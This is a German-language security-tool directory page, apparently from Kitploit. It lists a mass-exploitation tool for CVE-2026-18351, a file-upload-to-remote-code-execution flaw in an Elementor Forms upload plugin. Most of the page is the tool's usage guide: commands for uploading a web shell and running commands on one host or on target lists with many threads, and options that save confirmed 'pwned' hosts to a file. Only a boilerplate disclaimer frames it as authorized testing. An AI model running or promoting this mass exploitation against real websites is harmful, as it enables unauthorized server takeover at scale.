Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-18351 — Mass-Exploit-Tool für CVE-2026-18351, einen unauthentifizierten beliebigen Datei-Upload zu RCE in Elementor Forms <= 1.6.0, mit passivem Probing, Shell-Upload und Befehlsausführung. | Kitploit
Tools/GitHubGitHub/johenlastgen-jlg/cve-2026-18351
SchwachstellenscannerExploitationScripting & AutomatisierungWebanwendungs-ExploitationWebsicherheitPenetrationstestsRemote-Access-ToolPayload-Entwicklung
GitHub
johenlastgen-jlg/cve-2026-18351

CVE-2026-18351

Mass-Exploit-Tool für CVE-2026-18351, einen unauthentifizierten beliebigen Datei-Upload zu RCE in Elementor Forms <= 1.6.0, mit passivem Probing, Shell-Upload und Befehlsausführung.

Repository anzeigen
vor 16h 29mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-18351

Mass-Exploit-Tool für CVE-2026-18351 — Unauthenticated Arbitrary File Upload → RCE in Drag and Drop File Upload for Elementor Forms <= 1.6.0.

credit johenlastgen | telegram @johenlastgen | channel @jlgnetworkredirect


Features

  • Passive Schwachstellen-Sonde (kein Upload)
  • Vollständiger Exploit-Modus mit Shell-Upload & RCE-Bestätigung
  • Unterstützung für einzelne Ziele und Batch-Ziele
  • Multi-Thread-Unterstützung
  • Konfigurierbare Befehlsausführung
  • Vollständiges Log, nur-vuln- und nur-pwned-Ausgabedateien
  • Konfiguration des Request-Timeouts

Requirements

Keine externen Abhängigkeiten — verwendet nur die Python-Standardbibliothek.

root@kitploit:~
python3 --version  # 3.6+

Usage

root@kitploit:~
# Single target — passive check only (no upload)
python3 mass.py --url http://target.com --check

# Single target — exploit with default command (id)
python3 mass.py --url http://target.com --cmd id

# Single target — exploit with custom command
python3 mass.py --url http://target.com --cmd whoami

# Mass targets — passive check
python3 mass.py --list targets.txt --threads 50 --check

# Mass targets — exploit
python3 mass.py --list targets.txt --threads 50 --cmd id

# Mass targets — exploit with timeout tuning
python3 mass.py --list targets.txt --threads 100 --timeout 8 --cmd whoami

# Save full log
python3 mass.py --list targets.txt --output results.txt

# Save only vulnerable targets
python3 mass.py --list targets.txt --output-vuln vuln.txt

# Save only confirmed RCE targets
python3 mass.py --list targets.txt --output-pwned pwned.txt

# Combined output
python3 mass.py \
  --list targets.txt \
  --threads 50 \
  --cmd id \
  --output results.txt \
  --output-vuln vuln.txt \
  --output-pwned pwned.txt

Options

OptionDescription
--urlEinzelne Ziel-URL
--list FILEDatei mit Ziel-URLs (eine pro Zeile)
--checkNur passive Sonde — kein Datei-Upload
--cmd CMDBefehl, der auf der Shell ausgeführt werden soll (Standard: id)
--threads NAnzahl gleichzeitiger Threads (Standard: 20)
--timeout NTimeout pro Request in Sekunden (Standard: 10)
--output FILEVollständiges Log in Datei speichern
--output-vuln FILENur verwundbare Ziel-URLs in Datei speichern
--output-pwned FILENur bestätigte RCE-Ziele in Datei speichern

Output States

StateMeaning
PWNEDShell hochgeladen und RCE bestätigt
VULN-NO-EXECUpload akzeptiert, aber Shell-Ausführung fehlgeschlagen
PATCHEDUpload abgelehnt oder Nonce nicht gefunden
ERRORNetzwerk- oder Parse-Fehler

targets.txt Format

Eine URL pro Zeile. Zeilen, die mit # beginnen, werden ignoriert.

root@kitploit:~
http://target1.com
https://target2.com
# this line is ignored
http://target3.com

Disclaimer

Dieses Projekt wird ausschließlich für autorisierte Sicherheitsbewertungen, defensive Sicherheitsforschung und Schwachstellenvalidierung bereitgestellt.

Durch die Nutzung dieser Software bestätigen Sie, dass Sie über eine ausdrückliche Autorisierung zur Bewertung der Zielsysteme verfügen. Unbefugter Zugriff auf Computersysteme ist verboten und kann gegen geltende Gesetze verstoßen.

Der Autor und die Mitwirkenden fördern oder billigen keine unbefugte Nutzung dieses Projekts und übernehmen keine Verantwortung oder Haftung für Missbrauch, Schäden oder rechtliche Konsequenzen, die sich aus der Nutzung ergeben.


Author

JohenLastGen — JLG NETWORK

Tool herunterladen